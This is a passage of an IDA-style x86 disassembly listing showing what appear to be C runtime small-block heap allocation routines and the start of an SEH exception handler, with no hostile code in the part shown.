		mov	ebx, 8000h
		push	ebx
		push	ecx
		call	esi ; sub_455F45
		mov	ecx, dword_438850
		mov	eax, dword_4282CC
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax+8], edx
		mov	eax, dword_4282CC
		mov	eax, [eax+10h]
		mov	ecx, dword_438850
		and	dword ptr [eax+ecx*4+0C4h], 0
		mov	eax, dword_4282CC
		mov	eax, [eax+10h]
		dec	byte ptr [eax+43h]
		mov	eax, dword_4282CC
		mov	ecx, [eax+10h]
		cmp	byte ptr [ecx+43h], 0
		jnz	short loc_4063A6
		and	dword ptr [eax+4], 0FFFFFFFEh
		mov	eax, dword_4282CC

loc_4063A6:				; CODE XREF: sub_406110+28Bj
		cmp	dword ptr [eax+8], 0FFFFFFFFh
		jnz	short loc_406411
		push	ebx
		push	0
		push	dword ptr [eax+0Ch]
		call	esi ; sub_455F45
		mov	eax, dword_4282CC
		push	dword ptr [eax+10h]
		push	0
		push	dword_4282C8
		call	ds:dword_41E108	; RtlFreeHeap
		mov	ecx, dword_43883C
		mov	eax, dword_4282CC
		imul	ecx, 14h
		mov	edx, dword_438840
		sub	ecx, eax
		lea	ecx, [ecx+edx-14h]
		push	ecx
		lea	ecx, [eax+14h]
		push	ecx
		push	eax
		call	sub_407930
		mov	eax, [ebp+arg_0]
		add	esp, 0Ch
		dec	dword_43883C
		cmp	eax, dword_4282CC
		jbe	short loc_406407
		sub	[ebp+arg_0], 14h

loc_406407:				; CODE XREF: sub_406110+2F1j
		mov	eax, dword_438840
		mov	dword_438848, eax

loc_406411:				; CODE XREF: sub_406110+223j
					; sub_406110+29Aj
		mov	eax, [ebp+arg_0]
		mov	dword_4282CC, eax
		mov	dword_438850, edi

loc_40641F:				; CODE XREF: sub_406110+216j
		pop	ebx

loc_406420:				; CODE XREF: sub_406110+37j
		pop	edi
		pop	esi
		leave
		retn
sub_406110	endp


; =============== S U B	R O U T	I N E =======================================



sub_406424	proc near		; CODE XREF: sub_4068B9+C0p
		mov	eax, dword_43884C
		push	esi
		mov	esi, dword_43883C
		push	edi
		xor	edi, edi
		cmp	esi, eax
		jnz	short loc_40646B
		add	eax, 10h
		imul	eax, 14h
		push	eax
		push	dword_438840
		push	edi
		push	dword_4282C8
		call	ds:off_41E150
		cmp	eax, edi
		jnz	short loc_406459

loc_406455:				; CODE XREF: sub_406424+68j
					; sub_406424+94j
		xor	eax, eax
		jmp	short loc_4064D1
; ---------------------------------------------------------------------------

loc_406459:				; CODE XREF: sub_406424+2Fj
		add	dword_43884C, 10h
		mov	esi, dword_43883C
		mov	dword_438840, eax

loc_40646B:				; CODE XREF: sub_406424+11j
		imul	esi, 14h
		add	esi, dword_438840
		push	41C4h
		push	8
		push	dword_4282C8
		call	ds:dword_41E110	; RtlAllocateHeap
		cmp	eax, edi
		mov	[esi+10h], eax
		jz	short loc_406455
		push	4
		push	2000h
		push	100000h
		push	edi
		call	ds:off_41E154
		cmp	eax, edi
		mov	[esi+0Ch], eax
		jnz	short loc_4064BA
		push	dword ptr [esi+10h]
		push	edi
		push	dword_4282C8
		call	ds:dword_41E108	; RtlFreeHeap
		jmp	short loc_406455
; ---------------------------------------------------------------------------

loc_4064BA:				; CODE XREF: sub_406424+82j
		or	dword ptr [esi+8], 0FFFFFFFFh
		mov	[esi], edi
		mov	[esi+4], edi
		inc	dword_43883C
		mov	eax, [esi+10h]
		or	dword ptr [eax], 0FFFFFFFFh
		mov	eax, esi

loc_4064D1:				; CODE XREF: sub_406424+33j
		pop	edi
		pop	esi
		retn
sub_406424	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4064D4	proc near		; CODE XREF: sub_4068B9+D6p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+8]
		push	ebx
		push	esi
		mov	esi, [ecx+10h]
		push	edi
		xor	ebx, ebx
		jmp	short loc_4064EC
; ---------------------------------------------------------------------------

loc_4064E9:				; CODE XREF: sub_4064D4+1Aj
		add	eax, eax
		inc	ebx

loc_4064EC:				; CODE XREF: sub_4064D4+13j
		test	eax, eax
		jge	short loc_4064E9
		mov	eax, ebx
		imul	eax, 204h
		lea	eax, [eax+esi+144h]
		push	3Fh
		mov	[ebp+var_8], eax
		pop	edx

loc_406505:				; CODE XREF: sub_4064D4+3Bj
		mov	[eax+8], eax
		mov	[eax+4], eax
		add	eax, 8
		dec	edx
		jnz	short loc_406505
		push	4
		mov	edi, ebx
		push	1000h
		shl	edi, 0Fh
		add	edi, [ecx+0Ch]
		push	8000h
		push	edi
		call	ds:off_41E154
		test	eax, eax
		jnz	short loc_406538
		or	eax, 0FFFFFFFFh
		jmp	loc_4065D5
; ---------------------------------------------------------------------------

loc_406538:				; CODE XREF: sub_4064D4+5Aj
		lea	edx, [edi+7000h]
		cmp	edi, edx
		mov	[ebp+var_4], edx
		ja	short loc_406588
		mov	ecx, edx
		sub	ecx, edi
		shr	ecx, 0Ch
		lea	eax, [edi+10h]
		inc	ecx

loc_406550:				; CODE XREF: sub_4064D4+AFj
		or	dword ptr [eax-8], 0FFFFFFFFh
		or	dword ptr [eax+0FECh], 0FFFFFFFFh
		lea	edx, [eax+0FFCh]
		mov	[eax], edx
		lea	edx, [eax-1004h]
		mov	dword ptr [eax-4], 0FF0h
		mov	[eax+4], edx
		mov	dword ptr [eax+0FE8h], 0FF0h
		add	eax, 1000h
		dec	ecx
		jnz	short loc_406550
		mov	edx, [ebp+var_4]

loc_406588:				; CODE XREF: sub_4064D4+6Fj
		mov	eax, [ebp+var_8]
		add	eax, 1F8h
		lea	ecx, [edi+0Ch]
		mov	[eax+4], ecx
		mov	[ecx+8], eax
		lea	ecx, [edx+0Ch]
		mov	[eax+8], ecx
		mov	[ecx+4], eax
		and	dword ptr [esi+ebx*4+44h], 0
		xor	edi, edi
		inc	edi
		mov	[esi+ebx*4+0C4h], edi
		mov	al, [esi+43h]
		mov	cl, al
		inc	cl
		test	al, al
		mov	eax, [ebp+arg_0]
		mov	[esi+43h], cl
		jnz	short loc_4065C5
		or	[eax+4], edi

loc_4065C5:				; CODE XREF: sub_4064D4+ECj
		mov	edx, 80000000h
		mov	ecx, ebx
		shr	edx, cl
		not	edx
		and	[eax+8], edx
		mov	eax, ebx

loc_4065D5:				; CODE XREF: sub_4064D4+5Fj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4064D4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4065DA	proc near		; CODE XREF: sub_40E02D+77p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+10h]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, [ebp+arg_4]
		mov	edx, edi
		sub	edx, [ecx+0Ch]
		add	esi, 17h
		shr	edx, 0Fh
		mov	ecx, edx
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_C], ecx
		mov	ecx, [edi-4]
		and	esi, 0FFFFFFF0h
		dec	ecx
		cmp	esi, ecx
		lea	edi, [ecx+edi-4]
		mov	ebx, [edi]
		mov	[ebp+arg_8], ecx
		mov	[ebp+var_4], ebx
		jle	loc_40677C
		test	bl, 1
		jnz	loc_406775
		add	ebx, ecx
		cmp	esi, ebx
		jg	loc_406775
		mov	ecx, [ebp+var_4]
		sar	ecx, 4
		dec	ecx
		cmp	ecx, 3Fh
		mov	[ebp+var_8], ecx
		jbe	short loc_40664F
		push	3Fh
		pop	ecx
		mov	[ebp+var_8], ecx

loc_40664F:				; CODE XREF: sub_4065DA+6Dj
		mov	ebx, [edi+4]
		cmp	ebx, [edi+8]
		jnz	short loc_40669A
		cmp	ecx, 20h
		mov	ebx, 80000000h
		jnb	short loc_40667B
		shr	ebx, cl
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+eax+4]
		not	ebx
		and	[eax+edx*4+44h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_40669A
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_40669A
; ---------------------------------------------------------------------------

loc_40667B:				; CODE XREF: sub_4065DA+85j
		add	ecx, 0FFFFFFE0h
		shr	ebx, cl
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+eax+4]
		not	ebx
		and	[eax+edx*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_40669A
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_40669A:				; CODE XREF: sub_4065DA+7Bj
					; sub_4065DA+98j ...
		mov	ecx, [edi+8]
		mov	ebx, [edi+4]
		mov	[ecx+4], ebx
		mov	ecx, [edi+4]
		mov	edi, [edi+8]
		mov	[ecx+8], edi
		mov	ecx, [ebp+arg_8]
		sub	ecx, esi
		add	[ebp+var_4], ecx
		cmp	[ebp+var_4], 0
		jle	loc_406763
		mov	edi, [ebp+var_4]
		mov	ecx, [ebp+arg_4]
		sar	edi, 4
		dec	edi
		cmp	edi, 3Fh
		lea	ecx, [ecx+esi-4]
		jbe	short loc_4066D4
		push	3Fh
		pop	edi

loc_4066D4:				; CODE XREF: sub_4065DA+F5j
		mov	ebx, [ebp+var_C]
		lea	ebx, [ebx+edi*8]
		mov	[ebp+arg_8], ebx
		mov	ebx, [ebx+4]
		mov	[ecx+4], ebx
		mov	ebx, [ebp+arg_8]
		mov	[ecx+8], ebx
		mov	[ebx+4], ecx
		mov	ebx, [ecx+4]
		mov	[ebx+8], ecx
		mov	ebx, [ecx+4]
		cmp	ebx, [ecx+8]
		jnz	short loc_406751
		mov	cl, [edi+eax+4]
		mov	byte ptr [ebp+arg_8+3],	cl
		inc	cl
		cmp	edi, 20h
		mov	[edi+eax+4], cl
		jnb	short loc_406728
		cmp	byte ptr [ebp+arg_8+3],	0
		jnz	short loc_406720
		mov	ecx, edi
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], ebx

loc_406720:				; CODE XREF: sub_4065DA+136j
		lea	eax, [eax+edx*4+44h]
		mov	ecx, edi
		jmp	short loc_406748
; ---------------------------------------------------------------------------

loc_406728:				; CODE XREF: sub_4065DA+130j
		cmp	byte ptr [ebp+arg_8+3],	0
		jnz	short loc_40673E
		lea	ecx, [edi-20h]
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], ebx

loc_40673E:				; CODE XREF: sub_4065DA+152j
		lea	eax, [eax+edx*4+0C4h]
		lea	ecx, [edi-20h]

loc_406748:				; CODE XREF: sub_4065DA+14Cj
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax], edx

loc_406751:				; CODE XREF: sub_4065DA+11Ej
		mov	edx, [ebp+arg_4]
		mov	ecx, [ebp+var_4]
		lea	eax, [edx+esi-4]
		mov	[eax], ecx
		mov	[ecx+eax-4], ecx
		jmp	short loc_406766
; ---------------------------------------------------------------------------

loc_406763:				; CODE XREF: sub_4065DA+DEj
		mov	edx, [ebp+arg_4]

loc_406766:				; CODE XREF: sub_4065DA+187j
		lea	eax, [esi+1]
		mov	[edx-4], eax
		mov	[edx+esi-8], eax
		jmp	loc_4068B1
; ---------------------------------------------------------------------------

loc_406775:				; CODE XREF: sub_4065DA+50j
					; sub_4065DA+5Aj
		xor	eax, eax
		jmp	loc_4068B4
; ---------------------------------------------------------------------------

loc_40677C:				; CODE XREF: sub_4065DA+47j
		jge	loc_4068B1
		mov	ebx, [ebp+arg_4]
		sub	[ebp+arg_8], esi
		lea	ecx, [esi+1]
		mov	[ebx-4], ecx
		lea	ebx, [ebx+esi-4]
		mov	esi, [ebp+arg_8]
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		mov	[ebp+arg_4], ebx
		mov	[ebx-4], ecx
		jbe	short loc_4067A7
		push	3Fh
		pop	esi

loc_4067A7:				; CODE XREF: sub_4065DA+1C8j
		test	byte ptr [ebp+var_4], 1
		jnz	loc_406831
		mov	esi, [ebp+var_4]
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		jbe	short loc_4067C0
		push	3Fh
		pop	esi

loc_4067C0:				; CODE XREF: sub_4065DA+1E1j
		mov	ecx, [edi+4]
		cmp	ecx, [edi+8]
		jnz	short loc_40680A
		cmp	esi, 20h
		mov	ebx, 80000000h
		jnb	short loc_4067EB
		mov	ecx, esi
		shr	ebx, cl
		lea	esi, [esi+eax+4]
		not	ebx
		and	[eax+edx*4+44h], ebx
		dec	byte ptr [esi]
		jnz	short loc_406807
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_406807
; ---------------------------------------------------------------------------

loc_4067EB:				; CODE XREF: sub_4065DA+1F6j
		lea	ecx, [esi-20h]
		shr	ebx, cl
		lea	ecx, [esi+eax+4]
		not	ebx
		and	[eax+edx*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_406807
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_406807:				; CODE XREF: sub_4065DA+208j
					; sub_4065DA+20Fj ...
		mov	ebx, [ebp+arg_4]

loc_40680A:				; CODE XREF: sub_4065DA+1ECj
		mov	ecx, [edi+8]
		mov	esi, [edi+4]
		mov	[ecx+4], esi
		mov	esi, [edi+8]
		mov	ecx, [edi+4]
		mov	[ecx+8], esi
		mov	esi, [ebp+arg_8]
		add	esi, [ebp+var_4]
		mov	[ebp+arg_8], esi
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		jbe	short loc_406831
		push	3Fh
		pop	esi

loc_406831:				; CODE XREF: sub_4065DA+1D1j
					; sub_4065DA+252j
		mov	ecx, [ebp+var_C]
		lea	ecx, [ecx+esi*8]
		mov	edi, [ecx+4]
		mov	[ebx+8], ecx
		mov	[ebx+4], edi
		mov	[ecx+4], ebx
		mov	ecx, [ebx+4]
		mov	[ecx+8], ebx
		mov	ecx, [ebx+4]
		cmp	ecx, [ebx+8]
		jnz	short loc_4068A8
		mov	cl, [esi+eax+4]
		mov	byte ptr [ebp+arg_4+3],	cl
		inc	cl
		cmp	esi, 20h
		mov	[esi+eax+4], cl
		jnb	short loc_40687F
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406877
		mov	ecx, esi
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], edi

loc_406877:				; CODE XREF: sub_4065DA+28Dj
		lea	eax, [eax+edx*4+44h]
		mov	ecx, esi
		jmp	short loc_40689F
; ---------------------------------------------------------------------------

loc_40687F:				; CODE XREF: sub_4065DA+287j
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406895
		lea	ecx, [esi-20h]
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], edi

loc_406895:				; CODE XREF: sub_4065DA+2A9j
		lea	eax, [eax+edx*4+0C4h]
		lea	ecx, [esi-20h]

loc_40689F:				; CODE XREF: sub_4065DA+2A3j
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax], edx

loc_4068A8:				; CODE XREF: sub_4065DA+275j
		mov	eax, [ebp+arg_8]
		mov	[ebx], eax
		mov	[eax+ebx-4], eax

loc_4068B1:				; CODE XREF: sub_4065DA+196j
					; sub_4065DA:loc_40677Cj
		xor	eax, eax
		inc	eax

loc_4068B4:				; CODE XREF: sub_4065DA+19Dj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4065DA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4068B9	proc near		; CODE XREF: sub_403C1F+28p
					; sub_40DF0F+88p ...

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		mov	eax, dword_43883C
		mov	ecx, [ebp+arg_0]
		imul	eax, 14h
		add	eax, dword_438840
		add	ecx, 17h
		and	ecx, 0FFFFFFF0h
		mov	[ebp+var_10], ecx
		sar	ecx, 4
		push	ebx
		dec	ecx
		cmp	ecx, 20h
		push	esi
		push	edi
		jge	short loc_4068F0
		or	esi, 0FFFFFFFFh
		shr	esi, cl
		or	[ebp+var_8], 0FFFFFFFFh
		jmp	short loc_4068FD
; ---------------------------------------------------------------------------

loc_4068F0:				; CODE XREF: sub_4068B9+2Aj
		add	ecx, 0FFFFFFE0h
		or	edx, 0FFFFFFFFh
		xor	esi, esi
		shr	edx, cl
		mov	[ebp+var_8], edx

loc_4068FD:				; CODE XREF: sub_4068B9+35j
		mov	ecx, dword_438848
		mov	ebx, ecx
		jmp	short loc_406918
; ---------------------------------------------------------------------------

loc_406907:				; CODE XREF: sub_4068B9+64j
		mov	edx, [ebx+4]
		mov	edi, [ebx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_40691F
		add	ebx, 14h

loc_406918:				; CODE XREF: sub_4068B9+4Cj
		cmp	ebx, eax
		mov	[ebp+arg_0], ebx
		jb	short loc_406907

loc_40691F:				; CODE XREF: sub_4068B9+5Aj
		cmp	ebx, eax
		jnz	short loc_4069A2
		mov	ebx, dword_438840
		jmp	short loc_40693C
; ---------------------------------------------------------------------------

loc_40692B:				; CODE XREF: sub_4068B9+88j
		mov	edx, [ebx+4]
		mov	edi, [ebx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_406943
		add	ebx, 14h

loc_40693C:				; CODE XREF: sub_4068B9+70j
		cmp	ebx, ecx
		mov	[ebp+arg_0], ebx
		jb	short loc_40692B

loc_406943:				; CODE XREF: sub_4068B9+7Ej
		cmp	ebx, ecx
		jnz	short loc_4069A2
		jmp	short loc_406955
; ---------------------------------------------------------------------------

loc_406949:				; CODE XREF: sub_4068B9+9Ej
		cmp	dword ptr [ebx+8], 0
		jnz	short loc_406959
		add	ebx, 14h
		mov	[ebp+arg_0], ebx

loc_406955:				; CODE XREF: sub_4068B9+8Ej
		cmp	ebx, eax
		jb	short loc_406949

loc_406959:				; CODE XREF: sub_4068B9+94j
		cmp	ebx, eax
		jnz	short loc_40698E
		mov	ebx, dword_438840
		jmp	short loc_40696E
; ---------------------------------------------------------------------------

loc_406965:				; CODE XREF: sub_4068B9+BAj
		cmp	dword ptr [ebx+8], 0
		jnz	short loc_406975
		add	ebx, 14h

loc_40696E:				; CODE XREF: sub_4068B9+AAj
		cmp	ebx, ecx
		mov	[ebp+arg_0], ebx
		jb	short loc_406965

loc_406975:				; CODE XREF: sub_4068B9+B0j
		cmp	ebx, ecx
		jnz	short loc_40698E
		call	sub_406424
		mov	ebx, eax
		test	ebx, ebx
		mov	[ebp+arg_0], ebx
		jnz	short loc_40698E

loc_406987:				; CODE XREF: sub_4068B9+E7j
		xor	eax, eax
		jmp	loc_406B97
; ---------------------------------------------------------------------------

loc_40698E:				; CODE XREF: sub_4068B9+A2j
					; sub_4068B9+BEj ...
		push	ebx
		call	sub_4064D4
		pop	ecx
		mov	ecx, [ebx+10h]
		mov	[ecx], eax
		mov	eax, [ebx+10h]
		cmp	dword ptr [eax], 0FFFFFFFFh
		jz	short loc_406987

loc_4069A2:				; CODE XREF: sub_4068B9+68j
					; sub_4068B9+8Cj
		mov	dword_438848, ebx
		mov	eax, [ebx+10h]
		mov	edx, [eax]
		cmp	edx, 0FFFFFFFFh
		mov	[ebp+var_4], edx
		jz	short loc_4069C9
		mov	ecx, [eax+edx*4+0C4h]
		mov	edi, [eax+edx*4+44h]
		and	ecx, [ebp+var_8]
		and	edi, esi
		or	ecx, edi
		jnz	short loc_4069F2

loc_4069C9:				; CODE XREF: sub_4068B9+FAj
		and	[ebp+var_4], 0
		mov	edx, [eax+0C4h]
		lea	ecx, [eax+44h]

loc_4069D6:				; CODE XREF: sub_4068B9+134j
		mov	edi, [ecx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_4069EF
		inc	[ebp+var_4]
		mov	edx, [ecx+84h]
		add	ecx, 4
		jmp	short loc_4069D6
; ---------------------------------------------------------------------------

loc_4069EF:				; CODE XREF: sub_4068B9+126j
		mov	edx, [ebp+var_4]

loc_4069F2:				; CODE XREF: sub_4068B9+10Ej
		mov	ecx, edx
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_C], ecx
		mov	ecx, [eax+edx*4+44h]
		xor	edi, edi
		and	ecx, esi
		jnz	short loc_406A20
		mov	ecx, [eax+edx*4+0C4h]
		and	ecx, [ebp+var_8]
		push	20h
		pop	edi
		jmp	short loc_406A20
; ---------------------------------------------------------------------------

loc_406A1D:				; CODE XREF: sub_4068B9+169j
		add	ecx, ecx
		inc	edi

loc_406A20:				; CODE XREF: sub_4068B9+153j
					; sub_4068B9+162j
		test	ecx, ecx
		jge	short loc_406A1D
		mov	ecx, [ebp+var_C]
		mov	edx, [ecx+edi*8+4]
		mov	ecx, [edx]
		sub	ecx, [ebp+var_10]
		mov	esi, ecx
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		mov	[ebp+var_8], ecx
		jle	short loc_406A41
		push	3Fh
		pop	esi

loc_406A41:				; CODE XREF: sub_4068B9+183j
		cmp	esi, edi
		jz	loc_406B4A
		mov	ecx, [edx+4]
		cmp	ecx, [edx+8]
		jnz	short loc_406AAD
		cmp	edi, 20h
		mov	ebx, 80000000h
		jge	short loc_406A81
		mov	ecx, edi
		shr	ebx, cl
		mov	ecx, [ebp+var_4]
		lea	edi, [eax+edi+4]
		not	ebx
		mov	[ebp+var_14], ebx
		and	ebx, [eax+ecx*4+44h]
		mov	[eax+ecx*4+44h], ebx
		dec	byte ptr [edi]
		jnz	short loc_406AAA
		mov	ecx, [ebp+var_14]
		mov	ebx, [ebp+arg_0]
		and	[ebx], ecx
		jmp	short loc_406AAD
; ---------------------------------------------------------------------------

loc_406A81:				; CODE XREF: sub_4068B9+1A0j
		lea	ecx, [edi-20h]
		shr	ebx, cl
		mov	ecx, [ebp+var_4]
		lea	ecx, [eax+ecx*4+0C4h]
		lea	edi, [eax+edi+4]
		not	ebx
		and	[ecx], ebx
		dec	byte ptr [edi]
		mov	[ebp+var_14], ebx
		jnz	short loc_406AAA
		mov	ebx, [ebp+arg_0]
		mov	ecx, [ebp+var_14]
		and	[ebx+4], ecx
		jmp	short loc_406AAD
; ---------------------------------------------------------------------------

loc_406AAA:				; CODE XREF: sub_4068B9+1BCj
					; sub_4068B9+1E4j
		mov	ebx, [ebp+arg_0]

loc_406AAD:				; CODE XREF: sub_4068B9+196j
					; sub_4068B9+1C6j ...
		cmp	[ebp+var_8], 0
		mov	ecx, [edx+8]
		mov	edi, [edx+4]
		mov	[ecx+4], edi
		mov	ecx, [edx+4]
		mov	edi, [edx+8]
		mov	[ecx+8], edi
		jz	loc_406B56
		mov	ecx, [ebp+var_C]
		lea	ecx, [ecx+esi*8]
		mov	edi, [ecx+4]
		mov	[edx+8], ecx
		mov	[edx+4], edi
		mov	[ecx+4], edx
		mov	ecx, [edx+4]
		mov	[ecx+8], edx
		mov	ecx, [edx+4]
		cmp	ecx, [edx+8]
		jnz	short loc_406B47
		mov	cl, [esi+eax+4]
		mov	byte ptr [ebp+arg_0+3],	cl
		inc	cl
		cmp	esi, 20h
		mov	[esi+eax+4], cl
		jge	short loc_406B1E
		cmp	byte ptr [ebp+arg_0+3],	0
		jnz	short loc_406B0C
		mov	edi, 80000000h
		mov	ecx, esi
		shr	edi, cl
		or	[ebx], edi

loc_406B0C:				; CODE XREF: sub_4068B9+246j
		mov	ecx, esi
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+var_4]
		or	[eax+ecx*4+44h], edi
		jmp	short loc_406B47
; ---------------------------------------------------------------------------

loc_406B1E:				; CODE XREF: sub_4068B9+240j
		cmp	byte ptr [ebp+arg_0+3],	0
		jnz	short loc_406B31
		lea	ecx, [esi-20h]
		mov	edi, 80000000h
		shr	edi, cl
		or	[ebx+4], edi

loc_406B31:				; CODE XREF: sub_4068B9+269j
		mov	ecx, [ebp+var_4]
		lea	edi, [eax+ecx*4+0C4h]
		lea	ecx, [esi-20h]
		mov	esi, 80000000h
		shr	esi, cl
		or	[edi], esi

loc_406B47:				; CODE XREF: sub_4068B9+22Ej
					; sub_4068B9+263j
		mov	ecx, [ebp+var_8]

loc_406B4A:				; CODE XREF: sub_4068B9+18Aj
		test	ecx, ecx
		jz	short loc_406B59
		mov	[edx], ecx
		mov	[ecx+edx-4], ecx
		jmp	short loc_406B59
; ---------------------------------------------------------------------------

loc_406B56:				; CODE XREF: sub_4068B9+20Aj
		mov	ecx, [ebp+var_8]

loc_406B59:				; CODE XREF: sub_4068B9+293j
					; sub_4068B9+29Bj
		mov	esi, [ebp+var_10]
		add	edx, ecx
		lea	ecx, [esi+1]
		mov	[edx], ecx
		mov	[edx+esi-4], ecx
		mov	esi, [ebp+var_C]
		mov	ecx, [esi]
		test	ecx, ecx
		lea	edi, [ecx+1]
		mov	[esi], edi
		jnz	short loc_406B8F
		cmp	ebx, dword_4282CC
		jnz	short loc_406B8F
		mov	ecx, [ebp+var_4]
		cmp	ecx, dword_438850
		jnz	short loc_406B8F
		and	dword_4282CC, 0

loc_406B8F:				; CODE XREF: sub_4068B9+2BAj
					; sub_4068B9+2C2j ...
		mov	ecx, [ebp+var_4]
		mov	[eax], ecx
		lea	eax, [edx+4]

loc_406B97:				; CODE XREF: sub_4068B9+D0j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4068B9	endp

; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_406C00	proc near		; DATA XREF: __SEH_prolog4o

var_11		= byte ptr -11h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00408C91 SIZE 00000019 BYTES

		sub	esp, 14h
		push	ebx
		mov	ebx, [esp+18h+arg_4]
		push	ebp
		push	esi
		mov	esi, [ebx+8]
		xor	esi, dword_424064
		push	edi
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		mov	[esp+24h+var_11], 0
		mov	[esp+24h+var_C], 1
		lea	edi, [ebx+10h]
		jz	short loc_406C38
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406C38:				; CODE XREF: sub_406C00+29j
		mov	ecx, [esi+0Ch]
		mov	eax, [esi+8]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E
		mov	eax, [esp+24h+arg_0]
		test	byte ptr [eax+4], 66h
		jnz	loc_406D75
		mov	ebp, [ebx+0Ch]
		cmp	ebp, 0FFFFFFFEh
		mov	ecx, [esp+24h+arg_8]
		lea	edx, [esp+24h+var_8]
		mov	[esp+24h+var_8], eax
		mov	[esp+24h+var_4], ecx
		mov	[ebx-4], edx
		jz	short loc_406CCF

loc_406C71:				; CODE XREF: sub_406C00+A2j
		lea	eax, [ebp+ebp*2+0]
		mov	ecx, [esi+eax*4+14h]
		test	ecx, ecx
		lea	ebx, [esi+eax*4+10h]
		mov	eax, [ebx]
		mov	[esp+24h+var_10], eax
		jz	short loc_406C9D
		mov	edx, edi
		call	sub_408C7A
		test	eax, eax
		mov	[esp+24h+var_11], 1
		jl	short loc_406CDB
		jg	short loc_406CE5
		mov	eax, [esp+24h+var_10]

loc_406C9D:				; CODE XREF: sub_406C00+85j
		cmp	eax, 0FFFFFFFEh
		mov	ebp, eax
		jnz	short loc_406C71
		cmp	[esp+24h+var_11], 0
		jz	short loc_406CCF

loc_406CAB:				; CODE XREF: sub_406C00+E3j
					; sub_406C00+191j
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		jz	short loc_406CBF
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406CBF:				; CODE XREF: sub_406C00+B0j
		mov	ecx, [esi+0Ch]
		mov	eax, [esi+8]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406CCF:				; CODE XREF: sub_406C00+6Fj
					; sub_406C00+A9j ...
		mov	eax, [esp+24h+var_C]
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 14h
		retn
; ---------------------------------------------------------------------------

loc_406CDB:				; CODE XREF: sub_406C00+95j
		mov	[esp+24h+var_C], 0
		jmp	short loc_406CAB
; ---------------------------------------------------------------------------

loc_406CE5:				; CODE XREF: sub_406C00+97j
		mov	ecx, [esp+24h+arg_0]
		cmp	dword ptr [ecx], 0E06D7363h
		jnz	short loc_406D1B
		cmp	ds:off_41EC3C, 0
		jz	short loc_406D1B
		push	offset off_41EC3C
		call	sub_40D212
		add	esp, 4
		test	eax, eax
		jz	short loc_406D1B
		mov	edx, [esp+24h+arg_0]
		push	1
		push	edx
		call	ds:off_41EC3C
		add	esp, 8

loc_406D1B:				; CODE XREF: sub_406C00+EFj
					; sub_406C00+F8j ...
		mov	ecx, [esp+24h+arg_4]
		call	sub_408CAA
		mov	eax, [esp+24h+arg_4]
